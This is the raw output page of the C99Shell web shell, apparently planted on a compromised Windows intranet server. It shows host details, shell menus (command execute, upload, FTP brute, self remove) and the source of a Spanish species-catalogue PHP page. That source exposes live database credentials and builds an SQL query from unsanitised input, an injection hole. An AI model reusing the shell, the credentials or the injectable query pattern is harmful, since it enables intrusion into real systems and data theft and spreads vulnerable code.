!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\portel_dama\libreria\php\2006\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     especies.php (3.49 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
# FileName="Connection_php_mysql.htm"
# Type="MYSQL"
# HTTP="true"
$hostname_cndama "localhost";
$database_cndama "dama";
$username_cndama "jaime";
$password_cndama "123";
$cndama mysql_pconnect($hostname_cndama$username_cndama$password_cndama) or trigger_error(mysql_error(),E_USER_ERROR); 
//$l2006 = mysql_pconnect($hostname_l2006, $username_l2006, $password_l2006) or trigger_error(mysql_error(),E_USER_ERROR); 
?>
<?php
mysql_select_db
($database_cndama$cndama);
$query_rsEspecies "SELECT * FROM nueva_2006_especies order by nombre";
$rsEspecies mysql_query($query_rsEspecies$cndama) or die(mysql_error());
$row_rsEspecies mysql_fetch_assoc($rsEspecies);
$totalRows_rsEspecies mysql_num_rows($rsEspecies);

$numm_rsDetalle "0";
if (isset(
$numm)) {
  
$numm_rsDetalle = (get_magic_quotes_gpc()) ? $numm addslashes($numm);
}
mysql_select_db($database_cndama$cndama);
$query_rsDetalle sprintf("SELECT * FROM nueva_2006_especies WHERE num = %s ORDER BY nombre"$numm_rsDetalle);
$rsDetalle mysql_query($query_rsDetalle$cndama) or die(mysql_error());
$row_rsDetalle mysql_fetch_assoc($rsDetalle);
$totalRows_rsDetalle mysql_num_rows($rsDetalle);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
<link href="/dama/libreria/php/2006/estilos.css" rel="stylesheet" type="text/css" />
</head>

<body>
<p align="center"><strong>Fichas t&eacute;cnicas por especie, ordenadas   alfab&eacute;ticamente junto con su ilustraci&oacute;n, funci&oacute;n, nombres comunes, descripci&oacute;n,   posici&oacute;n ambiental, posici&oacute;n sucesional, aplicaci&oacute;n, otros usos y   propagaci&oacute;n.</strong></p>
<table width="90%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="30%" align="left" valign="top"><table width="80%" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td>&nbsp;</td>
      </tr>
      <?php do { ?>
        <tr>
          <td><a href="/dama/libreria/php/decide.php?patron=03.1305020113&amp;numm=<? echo $row_rsEspecies['num'];?>" class="txt"><?php echo $row_rsEspecies['nombre']; ?></a></td>
        </tr>
        <?php } while ($row_rsEspecies mysql_fetch_assoc($rsEspecies)); ?>
    </table></td>
    <td align="left" valign="top"><?php if ($totalRows_rsDetalle 0) { // Show if recordset not empty ?>
        <table width="100%" border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td align="left" valign="top"><table width="50%" border="0" align="center" cellpadding="0" cellspacing="0">
                <tr>
                  <td><div align="center"><span class="titlo"><?php echo $row_rsDetalle['nombre']; ?> - (</span><span class="botones"><?php echo $row_rsDetalle['especie']; ?></span>)<br />
                      <br />
                    <img src="<?php echo $row_rsDetalle['foto']; ?>" alt="<?php echo $row_rsDetalle['nombre']; ?>" /></div></td>
                </tr>
              </table>
              <br />
              <span class="txt"><br />
            <?php echo nl2br($row_rsDetalle['contenido']); ?></span></td>
          </tr>
                </table>
        <?php // Show if recordset not empty ?></td>
  </tr>
</table>
</body>
</html>
<?php
mysql_free_result
($rsEspecies);

mysql_free_result($rsDetalle);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--